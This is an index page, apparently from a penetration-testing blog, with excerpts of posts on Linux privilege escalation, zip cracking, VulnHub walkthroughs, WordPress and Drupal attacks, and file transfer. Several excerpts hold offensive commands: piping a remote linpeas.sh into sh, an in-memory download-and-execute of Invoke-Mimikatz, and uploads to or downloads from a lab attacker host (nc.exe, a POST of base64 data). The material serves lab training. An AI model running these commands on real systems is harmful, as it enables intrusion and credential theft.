Posted inCheat Sheets Enumeration
LINUX 101
Linux File System PathDescription/The top-level directory is the root filesystem and contains all of the files required to boot the operating system before other filesystems are mounted as well as…
Posted inPrivilege Escalation
Linux Privilege Escalation
LinPEAS Latest Releases: Release Release refs/heads/master 20230425-bd7331ea · carlospolop/PEASS-ng · GitHub # From Github curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh # Local network sudo python3 -m http.server 80 #Host curl 10.10.10.10/linpeas.sh…
Posted inVulnLAB
How to crack zip password on KALI linux
Fcrackzip is a fast password cracker partly written in assembler. It is able to crack password protected zip files with brute force or dictionary based attacks, optionally testing with unzip…
Posted inVulnLAB Practical LABS
VulnHub OS-bytesec: Walkthrough
Enumeration Nmap scan C:\home\zybersec\vulnhub\OS-bytesec> nmap -sC -sV -p- -A -T5 172.16.1.107 -oN OS-bytesec.txt Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-30 11:46 CEST Nmap scan report for 172.16.1.107 Host is…
Posted inVulnLAB Practical LABS
VulnHUB Prime-1: Walkthrough
Enumeration Nmap scan C:\home\zybersec> nmap -sC -sV -p- -A -T5 172.16.1.107 -oN prime1.txt Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-30 07:53 CEST Nmap scan report for 172.16.1.107 Host is…
Posted inEnumeration WebPentest
CURL
Wordpress curl -s http://blog.inlanefreight.local | grep WordPress curl -s http://blog.inlanefreight.local/ | grep themes curl -s http://blog.inlanefreight.local/ | grep plugins curl -s http://blog.inlanefreight.local/?p=1 | grep plugins
Posted inPenTest WebPentest
Attacking Drupal
Leveraging Known Vulnerabilities Over the years, Drupal core has suffered from a few serious remote code execution vulnerabilities, each dubbed Drupalgeddon. At the time of writing, there are 3 Drupalgeddon vulnerabilities…
Posted inVulnLAB Practical LABS
Walkthrough – VulnHUB DC-1
Enumeration Nmap scan nmap -sC -sV -p- -A -T5 172.16.1.106 -oN dc01.txt Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-29 07:04 CEST Nmap scan report for 172.16.1.106 Host is up…
Posted inCheat Sheets
FILE TRANSFER – Cheat Sheet
CommandDescription Invoke-WebRequest https://<snip>/PowerView.ps1 -OutFile PowerView.ps1Download a file with PowerShellIEX (New-Object Net.WebClient).DownloadString('https://<snip>/Invoke-Mimikatz.ps1')Execute a file in memory using PowerShellInvoke-WebRequest -Uri http://10.10.10.1:443 -Method POST -Body $b64Upload a file with PowerShellbitsadmin /transfer n http://10.10.10.1/nc.exe C:\Temp\nc.exeDownload…